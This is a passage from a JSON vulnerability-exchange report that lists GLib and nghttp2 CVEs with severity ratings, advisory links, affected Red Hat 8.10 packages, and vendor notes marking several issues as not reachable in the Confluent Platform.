          "url": "https://bugzilla.redhat.com/2492256"
        },
        {
          "url": "https://bugzilla.redhat.com/2499675"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2492243"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2492245"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2492247"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2492248"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2492255"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2492256"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2499675"
        },
        {
          "url": "https://creativecommons.org/licenses/by/4.0/"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-15588"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-58010"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-58011"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-58012"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-58013"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-58014"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-58015"
        },
        {
          "url": "https://errata.almalinux.org/9/ALSA-2026-55440.html"
        },
        {
          "url": "https://errata.rockylinux.org/RLSA-2026:55440"
        },
        {
          "url": "https://github.com/advisories/GHSA-4x46-h598-64qr"
        },
        {
          "url": "https://gitlab.gnome.org/GNOME/glib/-/issues/3925"
        },
        {
          "url": "https://linux.oracle.com/cve/CVE-2026-58013.html"
        },
        {
          "url": "https://linux.oracle.com/errata/ELSA-2026-55440.html"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-58013"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-58013"
        }
      ],
      "published": "2026-06-30T13:19:17+00:00",
      "updated": "2026-08-19T18:16:46+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "2.56.4-170.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-58014",
      "ratings": [
        {
          "source": {
            "name": "alma"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "amazon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 8.6,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:H"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 8.6,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:H"
        },
        {
          "source": {
            "name": "oracle-oval"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 7.3,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L"
        },
        {
          "source": {
            "name": "rocky"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        193
      ],
      "description": "A flaw was found in GLib. An off-by-one error can occur in the g_key_file_get_locale_string_list function in the gkeyfile.c file when loading a key file with an empty value. This flaw can cause an out-of-bounds access of 1 byte or a denial of service when the out-of-bounds access crosses a page boundary.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-58014"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:49512"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:55440"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:57015"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-58014"
        },
        {
          "url": "https://bugzilla.redhat.com/2492243"
        },
        {
          "url": "https://bugzilla.redhat.com/2492245"
        },
        {
          "url": "https://bugzilla.redhat.com/2492247"
        },
        {
          "url": "https://bugzilla.redhat.com/2492248"
        },
        {
          "url": "https://bugzilla.redhat.com/2492255"
        },
        {
          "url": "https://bugzilla.redhat.com/2492256"
        },
        {
          "url": "https://bugzilla.redhat.com/2499675"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2492243"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2492245"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2492247"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2492248"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2492255"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2492256"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2499675"
        },
        {
          "url": "https://creativecommons.org/licenses/by/4.0/"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-15588"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-58010"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-58011"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-58012"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-58013"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-58014"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-58015"
        },
        {
          "url": "https://errata.almalinux.org/9/ALSA-2026-55440.html"
        },
        {
          "url": "https://errata.rockylinux.org/RLSA-2026:55440"
        },
        {
          "url": "https://github.com/advisories/GHSA-h88q-m8mm-7243"
        },
        {
          "url": "https://gitlab.gnome.org/GNOME/glib/-/issues/3930"
        },
        {
          "url": "https://linux.oracle.com/cve/CVE-2026-58014.html"
        },
        {
          "url": "https://linux.oracle.com/errata/ELSA-2026-55440.html"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-58014"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-58014"
        }
      ],
      "published": "2026-06-30T13:19:17+00:00",
      "updated": "2026-08-19T18:16:46+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "2.56.4-170.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-58015",
      "ratings": [
        {
          "source": {
            "name": "alma"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "amazon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 7.5,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 7.5,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"
        },
        {
          "source": {
            "name": "oracle-oval"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 5.9,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N"
        },
        {
          "source": {
            "name": "rocky"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        22
      ],
      "description": "A flaw was found in GLib. The D-Bus client-side implementation of the DBUS_COOKIE_SHA1 SASL authentication mechanism does not validate the cookie_context parameter received from the server. A malicious D-Bus server can supply a cookie_context containing path traversal sequences, causing the client to read an arbitrary file and exfiltrate sensitive data by verifying guessed file contents against a generated hash.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-58015"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:49512"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:55440"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:57015"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-58015"
        },
        {
          "url": "https://bugzilla.redhat.com/2492243"
        },
        {
          "url": "https://bugzilla.redhat.com/2492245"
        },
        {
          "url": "https://bugzilla.redhat.com/2492247"
        },
        {
          "url": "https://bugzilla.redhat.com/2492248"
        },
        {
          "url": "https://bugzilla.redhat.com/2492255"
        },
        {
          "url": "https://bugzilla.redhat.com/2492256"
        },
        {
          "url": "https://bugzilla.redhat.com/2499675"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2492243"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2492245"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2492247"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2492248"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2492255"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2492256"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2499675"
        },
        {
          "url": "https://creativecommons.org/licenses/by/4.0/"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-15588"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-58010"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-58011"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-58012"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-58013"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-58014"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-58015"
        },
        {
          "url": "https://errata.almalinux.org/9/ALSA-2026-55440.html"
        },
        {
          "url": "https://errata.rockylinux.org/RLSA-2026:55440"
        },
        {
          "url": "https://github.com/advisories/GHSA-hmpf-72wc-2r6x"
        },
        {
          "url": "https://gitlab.gnome.org/GNOME/glib/-/issues/3931"
        },
        {
          "url": "https://linux.oracle.com/cve/CVE-2026-58015.html"
        },
        {
          "url": "https://linux.oracle.com/errata/ELSA-2026-55440.html"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-58015"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-58015"
        }
      ],
      "published": "2026-06-30T13:19:17+00:00",
      "updated": "2026-08-19T18:16:46+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "2.56.4-170.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-58055",
      "ratings": [
        {
          "source": {
            "name": "alma"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 5.4,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:L/I:L/A:N"
        },
        {
          "source": {
            "name": "oracle-oval"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 5.4,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:L/I:L/A:N"
        },
        {
          "source": {
            "name": "rocky"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        444
      ],
      "description": "nghttp2's nghttpx proxy through 1.69.0 forwards an HTTP/1.1 Upgrade request that also carries a Content-Length header and body onto reusable keep-alive backend connections, re-adding the Upgrade and Connection headers while passing Content-Length verbatim. A backend that resolves the resulting ambiguous message in the attacker's favor enables HTTP request/response smuggling and cross-client response-queue poisoning.",
      "recommendation": "Upgrade libnghttp2 to version 1.33.0-6.el8_10.3",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-58055"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:54650"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:54662"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-58055"
        },
        {
          "url": "https://bugzilla.redhat.com/2493954"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2493954"
        },
        {
          "url": "https://creativecommons.org/licenses/by/4.0/"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-58055"
        },
        {
          "url": "https://errata.almalinux.org/10/ALSA-2026-54650.html"
        },
        {
          "url": "https://errata.rockylinux.org/RLSA-2026:54662"
        },
        {
          "url": "https://github.com/advisories/GHSA-xrr7-82jr-v58x"
        },
        {
          "url": "https://github.com/bikini/exploitarium/tree/main/nghttp2-nghttpx-upgrade-queue-poison-poc"
        },
        {
          "url": "https://github.com/nghttp2/nghttp2/commit/ab28105c4a0197da24f8bfc414bc116055249e1e"
        },
        {
          "url": "https://linux.oracle.com/cve/CVE-2026-58055.html"
        },
        {
          "url": "https://linux.oracle.com/errata/ELSA-2026-55804.html"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-58055"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8495-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-58055"
        },
        {
          "url": "https://www.vulncheck.com/advisories/nghttp2-nghttpx-http-request-response-smuggling-via-upgrade-request-with-content-length"
        }
      ],
      "published": "2026-06-28T02:16:32+00:00",
      "updated": "2026-06-30T17:41:26+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/libnghttp2@1.33.0-6.el8_10.2?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "1.33.0-6.el8_10.2",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/libnghttp2@1.33.0-6.el8_10.2?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/libnghttp2@1.33.0-6.el8_10.2?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/libnghttp2@1.33.0-6.el8_10.2?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/libnghttp2@1.33.0-6.el8_10.2?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/libnghttp2@1.33.0-6.el8_10.2?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/libnghttp2@1.33.0-6.el8_10.2?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/libnghttp2@1.33.0-6.el8_10.2?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/libnghttp2@1.33.0-6.el8_10.2?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/libnghttp2@1.33.0-6.el8_10.2?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/libnghttp2@1.33.0-6.el8_10.2?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/libnghttp2@1.33.0-6.el8_10.2?arch=x86_64&distro=redhat-8.10"
        },
        {
